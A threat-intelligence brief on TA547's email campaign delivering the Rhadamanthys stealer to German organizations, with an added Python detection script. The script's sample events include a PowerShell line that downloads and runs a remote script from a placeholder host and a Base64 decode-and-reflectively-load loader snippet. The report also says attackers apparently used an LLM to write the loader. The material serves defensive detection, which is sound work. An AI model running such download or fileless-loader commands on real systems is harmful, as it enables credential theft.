TA547 targets German organizations with Rhadamanthys malware

TA547 group is targeting dozens of German organizations with an information stealer called Rhadamanthys, Proofpoint warns.

Security Affairs

TA547 Shifts Tactics: Leveraging Rhadamanthys Stealer in German-Specific Campaigns

Date: April 10, 2024

CVE: Not applicable

Vulnerability Type: Information Stealer

CWE: N/A

Sources: Proofpoint

Issue Summary

TA547, a financially motivated cybercriminal group, recently ran an email campaign against German organizations that delivered the Rhadamanthys malware. This is TA547's first recorded use of [[Rhadamanthys stealer]], an advanced information stealer already used by multiple other threat actors. The emails impersonated the German wholesaler Metro, and the attachment chain was built to run Rhadamanthys entirely in memory without writing the payload to disk, which sidesteps file-based antivirus scanning.

Technical Key Findings

The attack chain starts with a password-protected ZIP attachment containing an LNK file. Opening the LNK launches PowerShell, which runs a script that decodes an embedded, Base64-encoded Rhadamanthys executable and loads it directly in memory, so no stealer binary is ever written to disk. Proofpoint suspects the PowerShell script was generated by a large language model: every line carried a grammatically correct, hyper-specific comment describing what it does, a style rarely seen in hand-written cybercriminal tooling. The suspicion applies to the delivery script only; there is no indication that the [[Rhadamanthys stealer]] itself was LLM-generated, and a machine-written loader does not change how the malware behaves or how it is detected.

Vulnerable products

  • Windows platforms targeted via malicious email attachments

Impact assessment

[[Rhadamanthys stealer]] is designed to steal sensitive information, including credentials and financial data. Successful deployment within organizations can lead to significant data breaches, financial loss, and reputational damage.

Patches or workaround

The report specifies no patches, because no software vulnerability is exploited; the chain relies on a user opening an attachment. Organizations are advised to enhance email filtering (in particular, quarantine or block password-protected archives and LNK files arriving from outside the organization), educate employees on phishing, and deploy behavior-based detection for memory-resident malware and scripted delivery: enable PowerShell script block logging so the decoded second-stage script is captured, and alert on PowerShell processes spawned by explorer.exe from a temporary extraction folder that decode Base64 data and load it as an in-memory assembly.
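The following is an added example, not code from Proofpoint or from this page, illustrating the behavior-based detection recommended above against the attack chain described under "Technical Key Findings". It runs two heuristic rules over a handful of constructed telemetry records (a normalized process-creation event and PowerShell script block log entries, all invented for this example, not Proofpoint's IOCs): one flags PowerShell launched from explorer.exe out of a temp extraction folder with loader-style arguments, the other flags a script block that decodes Base64 and reflectively loads the result, with the dense line-by-line commenting treated only as a weak supporting signal. The field names and sample values are assumptions; adapt the record shape to your own SIEM's schema.

```python
import re

# Constructed sample events (not from the Proofpoint report). Each dict mimics a
# normalized Windows telemetry record: Sysmon/4688-style process creation and
# PowerShell script block logging (Event ID 4104).
SAMPLE_EVENTS = [
    # 1: explorer.exe launching PowerShell after a user opened an LNK inside an
    #    archive extracted to a temp folder; hidden window, policy bypass, remote script
    {"id": 1, "type": "process_create",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -ep bypass -c "iex (iwr http://example.invalid/a.ps1)"',
     "cwd": r"C:\Users\alice\AppData\Local\Temp\Temp1_invoice.zip\\"},
    # 2: second-stage script block: decode embedded payload, load it as an assembly
    #    in memory, invoke its entry point; every line is commented
    {"id": 2, "type": "script_block",
     "text": ("# Decode the embedded payload from Base64\n"
              "$bytes = [Convert]::FromBase64String($payload)\n"
              "# Load the decoded assembly into memory\n"
              "$asm = [System.Reflection.Assembly]::Load($bytes)\n"
              "# Invoke the entry point\n"
              "$asm.EntryPoint.Invoke($null, $null)")},
    # 3: benign admin script block
    {"id": 3, "type": "script_block",
     "text": "Get-ChildItem C:\\logs | Where-Object Length -gt 1MB"},
    # 4: benign process creation from the same parent
    {"id": 4, "type": "process_create",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt",
     "cwd": r"C:\Users\alice\Documents\\"},
]

# Rule 1 patterns: PowerShell launched with loader-style arguments from a user action
PS_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
PS_SUSPICIOUS_ARGS = [
    re.compile(r"-(w|win|window|windowstyle)\s+hidden", re.I),
    re.compile(r"-(ep|ex|exec|executionpolicy)\s+bypass", re.I),
    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I),
    re.compile(r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
]
ARCHIVE_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.I)

# Rule 2 patterns: decode-then-reflectively-load, i.e. fileless execution
B64_DECODE = re.compile(r"\[(System\.)?Convert\]::FromBase64String", re.I)
REFLECTIVE_LOAD = re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\b", re.I)
ENTRY_INVOKE = re.compile(r"\.EntryPoint\.Invoke\(", re.I)


def score_process_create(ev):
    """Return reasons if a PowerShell launch looks like an LNK-driven loader."""
    if not PS_IMAGE.search(ev.get("image", "")):
        return []
    context = []
    if ev.get("parent", "").lower().endswith("\\explorer.exe"):
        context.append("PowerShell spawned by explorer.exe (user double-click, e.g. an LNK)")
    if ARCHIVE_TEMP.search(ev.get("cwd", "")):
        context.append("working directory is a temp archive-extraction folder")
    hits = [p for p in PS_SUSPICIOUS_ARGS if p.search(ev.get("cmdline", ""))]
    # Require both a suspicious launch context and at least one loader-style argument
    if context and hits:
        return context + [f"suspicious arguments ({len(hits)} pattern(s))"]
    return []


def comment_ratio(text):
    """Fraction of non-empty lines that are comments; high values are only a weak signal."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if not lines:
        return 0.0
    return sum(1 for ln in lines if ln.lstrip().startswith("#")) / len(lines)


def score_script_block(ev):
    """Return reasons if a logged script block decodes and runs a payload in memory."""
    text = ev.get("text", "")
    reasons = []
    if B64_DECODE.search(text) and REFLECTIVE_LOAD.search(text):
        reasons.append("Base64 decode followed by in-memory assembly load (fileless execution)")
        if ENTRY_INVOKE.search(text):
            reasons.append("decoded assembly's entry point is invoked")
    if reasons and comment_ratio(text) >= 0.5:
        reasons.append("unusually dense line-by-line comments (weak signal only)")
    return reasons


def analyze(events):
    """Apply both rules and return one finding per event that triggered."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create":
            reasons = score_process_create(ev)
        elif ev["type"] == "script_block":
            reasons = score_script_block(ev)
        else:
            reasons = []
        if reasons:
            findings.append({"id": ev["id"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Only events 1 and 2 trigger; the benign script block and the notepad launch from the same parent do not. The comment-density check is deliberately gated behind a real behavioral hit, since plenty of legitimate scripts are well commented and a rule on comment style alone would be noise.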

Tags

#TA547 #Rhadamanthys #InformationStealer #Germany #Cybercrime #MalwareCampaign #PowerShell #AI_Malware

TA547 Targets German Organizations: Rhadamanthys Stealer | Proofpoint US

An email campaign delivering Rhadamanthys malware was discovered targeting German organizations. Learn more about TA547 and why it matters.

Proofpoint

Proofpoint identified the financially motivated TA547 targeting German organizations with an email campaign delivering Rhadamanthys malware. This is the first time researchers observed TA547 using Rhadamanthys, an information stealer that is used by multiple cybercriminal threat actors. Additionally, the actor appeared to use a PowerShell script that researchers suspect was generated by a large language model (LLM) such as ChatGPT, Gemini or Copilot. IOCs are provided. 🔗 https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer

#Rhadamanthys #TA547 #cybercrime #threatintel #IOC
